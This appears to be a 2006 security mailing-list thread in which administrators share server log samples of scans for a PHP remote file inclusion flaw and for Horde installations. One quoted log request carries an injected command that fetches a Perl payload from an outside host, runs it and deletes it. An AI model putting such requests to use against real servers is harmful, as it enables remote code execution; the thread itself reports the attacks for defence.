> Since Thursday night I'm seeing a high volume of scans
> on different web servers for possibly the following
> vulns:
>
> http://secunia.com/advisories/14337/
> http://www.osvdb.org/displayvuln.php?osvdb_id=10180
>
>
> However, they say the problem is on function.php and
> I'm seeing them on index.php. Can anyone confirm that?
>
> Some log samples:
>
> 200.80.39.39 - - [12/May/2006:15:27:28 -0300] "GET
> /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosC
onfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wge
t%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xenton
ix?
> HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> 217.160.131.47 - - [12/May/2006:15:34:30 -0300] "GET
Interestingly, putting a zero lenght file (link to /dev/zero here)
"/a1b2c3d4e5f6g7h8i9/nonexistentfile.php" seems to stop
them dead... Gotta wonder about the error checking in the 'spoit ;)
--
Karl Schlitt
karl (at) dakota-st (dot) com [email concealed]
> Since Thursday night I'm seeing a high volume of scans
> on different web servers for possibly the following
> vulns:
>
> http://secunia.com/advisories/14337/
> http://www.osvdb.org/displayvuln.php?osvdb_id=10180
>
>
> However, they say the problem is on function.php and
> I'm seeing them on index.php. Can anyone confirm that?
>
> Some log samples:
>
> 200.80.39.39 - - [12/May/2006:15:27:28 -0300] "GET
> /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosC
onfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wge
t%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xenton
ix?
> HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> 217.160.131.47 - - [12/May/2006:15:34:30 -0300] "GET
We are see horde attepts here.
222.233.120.3 - - [12/May/2006:23:59:11 -0500] "GET /horde-3.0.9//README
HTTP/1.1" 404 806
222.233.120.3 - - [12/May/2006:23:59:11 -0500] "GET /horde-3.0.9//README
HTTP/1.1" 404 806
222.233.120.3 - - [12/May/2006:23:59:11 -0500] "GET /Horde//README
HTTP/1.1" 404 806
222.233.120.3 - - [12/May/2006:23:59:11 -0500] "GET /Horde//README
HTTP/1.1" 404 806
204.11.239.43 - - [13/May/2006:13:28:21 -0500] "GET //README HTTP/1.1" 403
791
204.11.239.43 - - [13/May/2006:13:28:21 -0500] "GET /horde//README
HTTP/1.1" 404 806
204.11.239.43 - - [13/May/2006:13:28:21 -0500] "GET /horde2//README
HTTP/1.1" 404 806
204.11.239.43 - - [13/May/2006:13:28:22 -0500] "GET /horde3//README
HTTP/1.1" 404 806
204.11.239.43 - - [13/May/2006:13:28:22 -0500] "GET /horde-3.0.9//README
HTTP/1.1" 404 806
204.11.239.43 - - [13/May/2006:13:28:22 -0500] "GET /Horde//README
HTTP/1.1" 404 806
Interestingly, putting a zero lenght file (link to /dev/zero here)
"/a1b2c3d4e5f6g7h8i9/nonexistentfile.php" seems to stop
them dead... Gotta wonder about the error checking in the 'spoit ;)
--
Karl Schlitt
karl (at) dakota-st (dot) com [email concealed]
[ reply ]